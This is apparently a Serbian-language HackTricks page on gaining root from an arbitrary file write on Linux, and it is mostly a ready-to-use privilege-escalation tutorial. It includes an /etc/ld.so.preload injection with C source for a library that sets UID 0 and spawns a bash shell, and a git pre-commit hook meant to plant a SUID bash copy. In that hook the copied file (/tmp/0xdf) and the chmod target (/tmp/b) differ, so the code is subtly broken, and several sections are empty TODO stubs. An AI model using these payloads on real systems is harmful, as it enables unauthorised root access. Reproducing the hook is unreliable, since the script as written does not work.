2.7 KiB
Proizvoljan zapis datoteke u root direktorijum
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJAVU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
/etc/ld.so.preload
Ova datoteka se ponaša kao LD_PRELOAD env promenljiva ali takođe funkcioniše i u SUID binarnim fajlovima.
Ako možete da je kreirate ili modifikujete, možete jednostavno dodati putanju do biblioteke koja će biti učitana sa svakim izvršenim binarnim fajlom.
Na primer: echo "/tmp/pe.so" > /etc/ld.so.preload
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles
Git kuke
Git kuke su skripte koje se pokreću pri različitim događajima u git repozitorijumu, kao što je kreiranje commit-a, spajanje... Dakle, ako privilegovani skript ili korisnik često obavljaju ove radnje i mogu pisati u .git folder, to se može iskoristiti za privesc.
Na primer, moguće je generisati skriptu u git repozitorijumu u .git/hooks tako da se uvek izvršava kada je kreiran novi commit:
{% code overflow="wrap" %}
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit
Cron & Time fajlovi
TODO
Servis & Socket fajlovi
TODO
binfmt_misc
Fajl koji se nalazi u /proc/sys/fs/binfmt_misc pokazuje koji binarni fajl treba da izvrši koji tip fajla. TODO: proveriti uslove za zloupotrebu ovoga kako bi se izvršio reverzni shell kada je otvoren zajednički tip fajla.